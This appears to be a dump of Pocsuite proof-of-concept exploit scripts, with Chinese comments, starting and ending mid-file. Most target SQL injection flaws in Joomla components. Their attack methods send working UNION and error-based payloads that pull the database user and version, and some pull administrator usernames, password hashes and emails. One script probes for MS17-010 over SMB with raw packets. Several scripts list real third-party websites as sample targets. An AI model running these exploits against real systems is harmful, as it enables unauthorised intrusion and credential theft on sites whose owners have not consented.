8 | class TestPOC(POCBase):
9 | vulID = '67389' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2010-01-03'
13 | createDate = '2016-01-15'
14 | updateDate = '2016-01-15'
15 | references = ['http://www.sebug.net/vuldb/ssvid-67389']
16 | name = 'Joomla Component com_doqment (cid) SQL Injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla Component com_doqment'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Joomla Component com_doqment的参数cid过滤不严格,导致出现SQL注入漏洞。
23 | 远程攻击者可以利用该漏洞执行任意SQL指令,获取敏感信息。
24 | '''
25 | samples = ['http://www.ecosys-tec.com','http://novocement.ru',]
26 |
27 | def _attack(self):
28 | #利用注入漏洞读取数据库信息
29 | result = {}
30 | #利用的payload
31 | payload="-11/**/union/**/select/**/1,2,concat(0x247e7e7e24,version(),0x2a2a2a,user(),0x247e7e7e24),4,5,6,7,8--"
32 | #漏洞地址
33 | exploit='/index.php?option=com_doqment&cid='
34 | #构造访问地址
35 | vulurl=self.url+exploit+payload
36 | #自定义的HTTP头
37 | httphead = {
38 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
39 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
40 | 'Connection':'keep-alive'
41 | }
42 | #正则表达式
43 | par="\$~~~\$([0-9a-zA-Z_].*)\*\*\*([0-9a-zA-Z_].*)\$~~~\$"
44 | #访问
45 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
46 | #检查是否有特殊字符串
47 | if '$~~~$' in resp.content:
48 | match=re.search(par,resp.content,re.I|re.M)
49 | if match:
50 | #漏洞利用成功
51 | result['DatabaseInfo']={}
52 | #数据库版本
53 | result['DatabaseInfo']['Version']=match.group(1)
54 | #数据库用户
55 | result['DatabaseInfo']['Username']=match.group(2)
56 | return self.parse_output(result)
57 |
58 | def _verify(self):
59 | #利用注入漏洞计算md5(1)
60 | result = {}
61 | #利用的payload
62 | payload='-11/**/union/**/select/**/1,2,md5(1),4,5,6,7,8--'
63 | #漏洞地址
64 | exploit='/index.php?option=com_doqment&cid='
65 | #构造访问地址
66 | vulurl=self.url+exploit+payload
67 | #自定义的HTTP头
68 | httphead = {
69 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
70 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
71 | 'Connection':'keep-alive'
72 | }
73 | #访问
74 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
75 | #检查是否有特殊字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
76 | if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
77 | #漏洞验证成功
78 | result['VerifyInfo']={}
79 | result['VerifyInfo']['URL'] = self.url+exploit
80 | result['VerifyInfo']['Payload'] = payload
81 | return self.parse_output(result)
82 |
83 | def parse_output(self, result):
84 | #parse output
85 | output = Output(self)
86 | if result:
87 | output.success(result)
88 | else:
89 | output.fail('Internet nothing returned')
90 | return output
91 |
92 |
93 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component JE Event Calendar SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '67594' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2010-03-02'
13 | createDate = '2016-01-05'
14 | updateDate = '2016-01-05'
15 | references = ['http://www.sebug.net/vuldb/ssvid-67594']
16 | name = 'Joomla Component JE Event Calendar SQL Injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.com'
18 | appName = 'Joomla Component JE Event Calendar'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Joomla!的组件JE Event Calendars (com_jeeventcalendar)存在SQL注入漏洞。
23 | 远程攻击者可以借助脚本index.php中的事件操作的event_id参数,执行任意的SQL命令。
24 | '''
25 | samples = ['http://starstudentcard.com']
26 |
27 | def _attack(self):
28 | #利用SQL注入读取数据库信息
29 | result = {}
30 | #访问的地址
31 | exploit='/index.php?option=com_jeeventcalendar&view=event&Itemid=155&event_id='
32 | #利用Union方式读取数据库信息
33 | payload="-1%22+UNION+ALL+SELECT+1,concat(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24),3,4,5,6,7,8,9,10,11%23"
34 | #构造漏洞利用连接
35 | vulurl=self.url+exploit+payload
36 | #自定义的HTTP头
37 | httphead = {
38 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
39 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
40 | 'Connection':'keep-alive'
41 | }
42 | #提取信息的正则表达式
43 | parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
44 | #发送请求
45 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
46 | #检查返回结果
47 | if resp.status_code==200:
48 | #提取信息
49 | match=re.search(parttern,resp.content,re.M|re.I)
50 | if match:
51 | #漏洞利用成功
52 | result['DatabaseInfo']={}
53 | #数据库用户名
54 | result['DatabaseInfo']['Username']=match.group(1)
55 | #数据库版本
56 | result['DatabaseInfo']['Version']=match.group(2)
57 | return self.parse_output(result)
58 |
59 | def _verify(self):
60 | #通过计算md5(1)的值,来验证SQL注入
61 | result = {}
62 | #访问的地址
63 | exploit='/index.php?option=com_jeeventcalendar&view=event&Itemid=155&event_id='
64 | #利用Union方式(计算md5(1))
65 | payload="-1%22+UNION+ALL+SELECT+1,md5(1),3,4,5,6,7,8,9,10,11%23"
66 | #构造漏洞利用连接
67 | vulurl=self.url+exploit+payload
68 | #自定义的HTTP头
69 | httphead = {
70 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
71 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
72 | 'Connection':'keep-alive'
73 | }
74 | #发送请求
75 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
76 | #检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
77 | if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
78 | #漏洞验证成功
79 | result['VerifyInfo']={}
80 | result['VerifyInfo']['URL'] = self.url+exploit
81 | result['VerifyInfo']['Payload'] = payload
82 | return self.parse_output(result)
83 |
84 | def parse_output(self, result):
85 | #parse output
86 | output = Output(self)
87 | if result:
88 | output.success(result)
89 | else:
90 | output.fail('Internet nothing returned')
91 | return output
92 |
93 |
94 | register(TestPOC)
--------------------------------------------------------------------------------
/_170605_SMB_ms17_010_RCE.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # @Author : jeffzhang
4 | # @Time : 2018/04/19
5 | # @File : _170605_SMB_ms17_010_RCE.py
6 | # @Desc : ""
7 |
8 | import binascii
9 | import socket
10 | from pocsuite.api.poc import register
11 | from pocsuite.api.poc import Output, POCBase
12 |
13 |
14 | class TestPOC(POCBase):
15 | vulID = '00005'
16 | version = '1'
17 | author = 'jeffzhang'
18 | vulDate = '2017-05-12'
19 | createDate = '2018-04-19'
20 | updateDate = '2018-04-19'
21 | references = ['']
22 | name = 'MS17-010 SMB 远程命令执行漏洞'
23 | appPowerLink = 'https://www.microsoft.com'
24 | appName = 'SMB Server'
25 | appVersion = 'All'
26 | vulType = 'RCE'
27 | desc = '''
28 | SMB Server存在多个远程执行代码漏洞 成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力
29 | '''
30 | samples = ['']
31 |
32 | def _verify(self):
33 | result = {}
34 | target_ip = self.url.split(':')[1].strip('/')
35 | if len(self.url.split(':')) > 2:
36 | target_port = int(self.url.split(':')[2].strip('/'))
37 | else:
38 | target_port = 445
39 | negotiate_protocol_request = binascii.unhexlify("00000054ff534d4272000000001801280000000000000000000000000000"
40 | "2f4b0000c55e003100024c414e4d414e312e3000024c4d312e3258303032"
41 | "00024e54204c414e4d414e20312e3000024e54204c4d20302e313200")
42 |
43 | session_setup_request = binascii.unhexlify("00000063ff534d42730000000018012000000000000000000000000000002f4b0"
44 | "000c55e0dff000000dfff02000100000000000000000000000000400000002600"
45 | "002e0057696e646f7773203230303020323139350057696e646f7773203230303"
46 | "020352e3000")
47 | try:
48 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
49 | s.settimeout(5)
50 | s.connect((target_ip, target_port))
51 | s.send(negotiate_protocol_request)
52 | s.recv(1024)
53 | s.send(session_setup_request)
54 | data = s.recv(1024)
55 | user_id = data[32:34]
56 | tree_connect_andx_request = "000000%xff534d42750000000018012000000000000000000000000000002f4b%sc55e04ff00" \
57 | "0000000001001a00005c5c%s5c49504324003f3f3f3f3f00" % (
58 | (58 + len(target_ip)), user_id.encode('hex'), target_ip.encode('hex'))
59 | s.send(binascii.unhexlify(tree_connect_andx_request))
60 | data = s.recv(1024)
61 | all_id = data[28:36]
62 | payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff000000000000000000" \
63 | "0000004a0000004a0002002300000007005c504950455c00" % all_id.encode('hex')
64 | s.send(binascii.unhexlify(payload))
65 | data = s.recv(1024)
66 | s.close()
67 | if "\x05\x02\x00\xc0" in data:
68 | result['VerifyInfo'] = {}
69 | result['VerifyInfo']['URL'] = self.url
70 | result['VerifyInfo']['Payload'] = payload[:20]
71 | result['VerifyInfo']['result'] = data[:20]
72 | except Exception as e:
73 | pass
74 | return self.parse_attack(result)
75 |
76 | def _attack(self):
77 | return self._verify()
78 |
79 | def parse_attack(self, result):
80 | output = Output(self)
81 | if result:
82 | output.success(result)
83 | else:
84 | output.fail('Internet noting return')
85 | return output
86 |
87 |
88 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '72200' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2011-11-29'
13 | createDate = '2016-01-10'
14 | updateDate = '2016-01-10'
15 | references = ['http://www.sebug.net/vuldb/ssvid-72200']
16 | name = 'Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection'
17 | appPowerLink = 'http://www.joomla.com'
18 | appName = 'Joomla Time Returns Component'
19 | appVersion = '2.0'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Joomla!的Time Returns(com_timereturns)组件2.0版本中存在SQL注入漏洞。
23 | 主要是对参数id过滤不严格造成的,远程攻击者可借助id参数执行任意SQL命令。
24 | '''
25 | samples = ['http://www.110xo.com/page/service']
26 |
27 | def _attack(self):
28 | #利用floor回显报错的方式,读取数据库信息
29 | result = {}
30 | payload="1' AND (SELECT 1222 FROM(SELECT COUNT(*),"\
31 | "CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,"\
32 | "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
33 | exploit="/index.php?option=com_timereturns&view=timereturns&id="
34 | #提取信息的正则表达式
35 | pars="\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$"
36 | #构造访问地址
37 | vulurl=self.url+exploit+payload
38 | #自定义的HTTP
39 | httphead = {
40 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
41 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
42 | 'Connection':'keep-alive'
43 | }
44 | #尝试访问
45 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
46 | #检查
47 | if 'Duplicate entry' in resp.content:
48 | #尝试提取信息
49 | match=re.search(pars,resp.content,re.I|re.M)
50 | if match:
51 | #记录数据库信息
52 | result['DatabaseInfo']={}
53 | #数据库用户名
54 | result['DatabaseInfo']['Username']=match.group(1)
55 | #数据库版本
56 | result['DatabaseInfo']['Version']=match.group(2)
57 | return self.parse_output(result)
58 |
59 | def _verify(self):
60 | #利用注入漏洞计算md5(1)
61 | result = {}
62 | #利用的payload(利用的是floor回显报错的方式)
63 | payload="1' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),"\
64 | "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
65 | #漏洞页面
66 | exploit='/index.php?option=com_timereturns&view=timereturns&id='
67 | #构造访问地址
68 | vulurl=self.url+exploit+payload
69 | #自定义的HTTP
70 | httphead = {
71 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
72 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
73 | 'Connection':'keep-alive'
74 | }
75 | #尝试访问
76 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
77 | #检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
78 | if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
79 | #漏洞验证成功
80 | result['VerifyInfo']={}
81 | result['VerifyInfo']['URL'] = self.url+exploit
82 | result['VerifyInfo']['Payload'] = payload
83 | return self.parse_output(result)
84 |
85 | def parse_output(self, result):
86 | #parse output
87 | output = Output(self)
88 | if result:
89 | output.success(result)
90 | else:
91 | output.fail('Internet nothing returned')
92 | return output
93 |
94 |
95 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '65822' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2009-02-19'
13 | createDate = '2016-01-20'
14 | updateDate = '2016-01-20'
15 | references = ['http://www.sebug.net/vuldb/ssvid-65822']
16 | name = 'Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla Component Ignite Gallery'
19 | appVersion = '0.8.3'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Ignite Gallery (com_ignitegallery)组件0.8.0版本至0.8.3版本中存在SQL注入漏洞,
23 | 远程攻击者可以借助对index.php的一个图像操作中的gallery参数,执行任意SQL指令。
24 | '''
25 | samples = ['http://www.crnm.org','http://www.bike-and-run.com']
26 |
27 | def _attack(self):
28 | #利用SQL注入读取joomla管理员信息
29 | result = {}
30 | #访问的地址
31 | exploit='/index.php?option=com_ignitegallery&task=view&gallery='
32 | #利用Union方式读取信息
33 | payload="-1 union select 1,2,concat(0x247e7e7e24,username,0x2a2a2a,"\
34 | "password,0x2a2a2a,email,0x247e7e7e24),4,5,6,7,8,9,10 from jos_users limit 0,1--"
35 | #构造漏洞利用连接
36 | vulurl=self.url+exploit+payload
37 | #自定义的HTTP头
38 | httphead = {
39 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
40 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
41 | 'Connection':'keep-alive'
42 | }
43 | #提取信息的正则表达式
44 | parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
45 | #发送请求
46 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
47 | #检查是否含有特征字符串
48 | if '$~~~$' in resp.content:
49 | #提取信息
50 | match=re.search(parttern,resp.content,re.M|re.I)
51 | if match:
52 | #漏洞利用成功
53 | result['AdminInfo']={}
54 | #用户名
55 | result['AdminInfo']['Username']=match.group(1)
56 | #密码
57 | result['AdminInfo']['Password']=match.group(2)
58 | #邮箱
59 | result['AdminInfo']['Email']=match.group(3)
60 | return self.parse_output(result)
61 |
62 | def _verify(self):
63 | #通过计算md5(3.1415)的值,来验证SQL注入
64 | result = {}
65 | #访问的地址
66 | exploit='/index.php?option=com_ignitegallery&task=view&gallery='
67 | #利用union的方式(计算md5(3.1415))
68 | payload="-1 union select 1,2,md5(3.1415),4,5,6,7,8,9,10--"
69 | #构造漏洞利用连接
70 | vulurl=self.url+exploit+payload
71 | #自定义的HTTP头
72 | httphead = {
73 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
74 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
75 | 'Connection':'keep-alive'
76 | }
77 | #发送请求
78 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
79 | #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
80 | if '63e1f04640e83605c1d177544a5a0488' in resp.content:
81 | #漏洞验证成功
82 | result['VerifyInfo']={}
83 | result['VerifyInfo']['URL'] = self.url+exploit
84 | result['VerifyInfo']['Payload'] = payload
85 | return self.parse_output(result)
86 |
87 | def parse_output(self, result):
88 | #parse output
89 | output = Output(self)
90 | if result:
91 | output.success(result)
92 | else:
93 | output.fail('Internet nothing returned')
94 | return output
95 |
96 |
97 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla RSfiles Component (cid param) - SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '78538' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2013-03-18'
13 | createDate = '2016-01-23'
14 | updateDate = '2016-01-23'
15 | references = ['http://www.seebug.org/vuldb/ssvid-78538']
16 | name = 'Joomla RSfiles Component (cid param) - SQL Injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla RSfiles Component'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | joomla组件RSfiles由于对参数cid过滤不严格,导致出现SQL注入漏洞。
23 | 远程攻击者可以利用该漏洞执行SQL指令。
24 | '''
25 | samples = ['http://www.ccdwoll.org.au/ccd']
26 |
27 | def _attack(self):
28 | #利用SQL注入读取joomla管理员信息
29 | result = {}
30 | #访问的地址
31 | exploit='/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid='
32 | #利用Union方式读取信息(进行了char编码)
33 | payload="-1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat(CHAR(36, 126, 126, 126, 36),username,"\
34 | "CHAR(42, 42, 42),password,CHAR(42, 42, 42),email,CHAR(36, 126, 126, 126, 36))/**/from/**/jos_users--"
35 | #构造漏洞利用连接
36 | vulurl=self.url+exploit+payload
37 | #自定义的HTTP头
38 | httphead = {
39 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
40 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
41 | 'Connection':'keep-alive'
42 | }
43 | #提取信息的正则表达式
44 | parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
45 | #发送请求
46 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
47 | #检查是否含有特征字符串
48 | if '$~~~$' in resp.content:
49 | #提取信息
50 | match=re.search(parttern,resp.content,re.M|re.I)
51 | if match:
52 | #漏洞利用成功
53 | result['AdminInfo']={}
54 | #用户名
55 | result['AdminInfo']['Username']=match.group(1)
56 | #密码
57 | result['AdminInfo']['Password']=match.group(2)
58 | #邮箱
59 | result['AdminInfo']['Email']=match.group(3)
60 | return self.parse_output(result)
61 |
62 | def _verify(self):
63 | #通过计算md5(3.1415)的值,来验证SQL注入
64 | result = {}
65 | #访问的地址
66 | exploit='/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid='
67 | #利用union的方式(计算md5(3.1415))
68 | payload="-1/**/aNd/**/1=0/**/uNioN++sElecT+1,md5(3.1415)--"
69 | #构造漏洞利用连接
70 | vulurl=self.url+exploit+payload
71 | #自定义的HTTP头
72 | httphead = {
73 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
74 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
75 | 'Connection':'keep-alive'
76 | }
77 | #发送请求
78 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
79 | #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
80 | if '63e1f04640e83605c1d177544a5a0488' in resp.content:
81 | #漏洞验证成功
82 | result['VerifyInfo']={}
83 | result['VerifyInfo']['URL'] = self.url+exploit
84 | result['VerifyInfo']['Payload'] = payload
85 | return self.parse_output(result)
86 |
87 | def parse_output(self, result):
88 | #parse output
89 | output = Output(self)
90 | if result:
91 | output.success(result)
92 | else:
93 | output.fail('Internet nothing returned')
94 | return output
95 |
96 |
97 | register(TestPOC)
--------------------------------------------------------------------------------
/HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '86873' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2010-04-13'
13 | createDate = '2016-01-27'
14 | updateDate = '2016-01-27'
15 | references = ['http://www.seebug.org/vuldb/ssvid-86873']
16 | name = 'HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'HD FLV Player Component for Joomla!'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Joomla!是一款开放源码的内容管理系统(CMS)。
23 | Joomla!的组件HD FLV Player (com_hdflvplayer)存在SQL注入漏洞。
24 | 远程攻击者可以利用脚本index.php的id执行任意的SQL指令。
25 | '''
26 | samples = ['http://zeweldfc.com']
27 |
28 | def _attack(self):
29 | #利用floor回显报错的方式,读取数据库信息
30 | result = {}
31 | payload=("1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT"
32 | "(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,"
33 | "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- -")
34 | exploit="/index.php?option=com_hdflvplayer&id="
35 | #提取信息的正则表达式
36 | pars="\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$"
37 | #构造访问地址
38 | vulurl=self.url+exploit+payload
39 | #自定义的HTTP
40 | httphead = {
41 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
42 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
43 | 'Connection':'keep-alive'
44 | }
45 | #尝试访问
46 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
47 | #检查
48 | if 'Duplicate entry' in resp.content:
49 | #尝试提取信息
50 | match=re.search(pars,resp.content,re.I|re.M)
51 | if match:
52 | #记录数据库信息
53 | result['DatabaseInfo']={}
54 | #数据库用户名
55 | result['DatabaseInfo']['Username']=match.group(1)
56 | #数据库版本
57 | result['DatabaseInfo']['Version']=match.group(2)
58 | return self.parse_output(result)
59 |
60 | def _verify(self):
61 | #利用注入漏洞计算md5(3.1415)
62 | result = {}
63 | #利用的payload(利用的是floor回显报错的方式)
64 | payload=("1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT"
65 | "(md5(3.1415),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA"
66 | ".CHARACTER_SETS GROUP BY x)a) -- -")
67 | #漏洞页面
68 | exploit='/index.php?option=com_hdflvplayer&id='
69 | #构造访问地址
70 | vulurl=self.url+exploit+payload
71 | #自定义的HTTP
72 | httphead = {
73 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
74 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
75 | 'Connection':'keep-alive'
76 | }
77 | #尝试访问
78 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
79 | #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
80 | if '63e1f04640e83605c1d177544a5a0488' in resp.content:
81 | #漏洞验证成功
82 | result['VerifyInfo']={}
83 | result['VerifyInfo']['URL'] = self.url+exploit
84 | result['VerifyInfo']['Payload'] = payload
85 | return self.parse_output(result)
86 |
87 | def parse_output(self, result):
88 | #parse output
89 | output = Output(self)
90 | if result:
91 | output.success(result)
92 | else:
93 | output.fail('Internet nothing returned')
94 | return output
95 |
96 |
97 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '10171' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2008-12-05'
13 | createDate = '2016-01-09'
14 | updateDate = '2016-01-09'
15 | references = ['http://www.sebug.net/vuldb/ssvid-10171']
16 | name = 'Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla!'
19 | appVersion = '1.4.2'
20 | vulType = 'SQL injection'
21 | desc = '''
22 | Joomla组件mydyngallery版本1.4.2在参数directory由于过滤不严格,存在SQL注入漏洞。
23 | 远程攻击中可以利用该漏洞执行SQL指令,获取敏感信息。
24 | '''
25 | samples = ['http://www.lesgourmands.com','http://www.sebka.ca/w']
26 |
27 | def _attack(self):
28 | #利用SQL注入读取数据库信息
29 | result = {}
30 | #访问的地址
31 | exploit='/index.php?option=com_mydyngallery&directory='
32 | #利用floor错误回显的方式读取数据库信息
33 | payload="1' and 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT("\
34 | "(SELECT SUBSTRING(CONCAT(0x247e7e7e24,user(),0x2a2a2a,"\
35 | "version(),0x247e7e7e24),1,60)),FLOOR(RAND(0)*2))X FROM "\
36 | "information_schema.tables GROUP BY X)a) and '1'='1"
37 | #构造漏洞利用连接
38 | vulurl=self.url+exploit+payload
39 | #自定义的HTTP头
40 | httphead = {
41 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
42 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
43 | 'Connection':'keep-alive'
44 | }
45 | #提取信息的正则表达式
46 | parttern='\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$'
47 | #发送请求
48 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
49 | #检查是否含有特征字符串
50 | if 'Duplicate entry' in resp.content:
51 | #提取信息
52 | match=re.search(parttern,resp.content,re.M|re.I)
53 | if match:
54 | #漏洞利用成功
55 | result['DatabaseInfo']={}
56 | #数据库用户名
57 | result['DatabaseInfo']['Username']=match.group(1)
58 | #数据库版本
59 | result['DatabaseInfo']['Version']=match.group(2)
60 | return self.parse_output(result)
61 |
62 | def _verify(self):
63 | #通过计算md5(1)的值,来验证SQL注入
64 | result = {}
65 | #访问的地址
66 | exploit='/index.php?option=com_mydyngallery&directory='
67 | #利用floor错误回显的方式(计算md5(1))
68 | payload="1' and 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT"\
69 | "((SELECT SUBSTRING(CONCAT(md5(1),0x247e7e7e24),1,60)),"\
70 | "FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a) and '1'='1"
71 | #构造漏洞利用连接
72 | vulurl=self.url+exploit+payload
73 | #自定义的HTTP头
74 | httphead = {
75 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
76 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
77 | 'Connection':'keep-alive'
78 | }
79 | #发送请求
80 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
81 | #检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
82 | if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
83 | #漏洞验证成功
84 | result['VerifyInfo']={}
85 | result['VerifyInfo']['URL'] = self.url+exploit
86 | result['VerifyInfo']['Payload'] = payload
87 | return self.parse_output(result)
88 |
89 | def parse_output(self, result):
90 | #parse output
91 | output = Output(self)
92 | if result:
93 | output.success(result)
94 | else:
95 | output.fail('Internet nothing returned')
96 | return output
97 |
98 |
99 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Kunena Component (index.php, search parameter) SQL Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
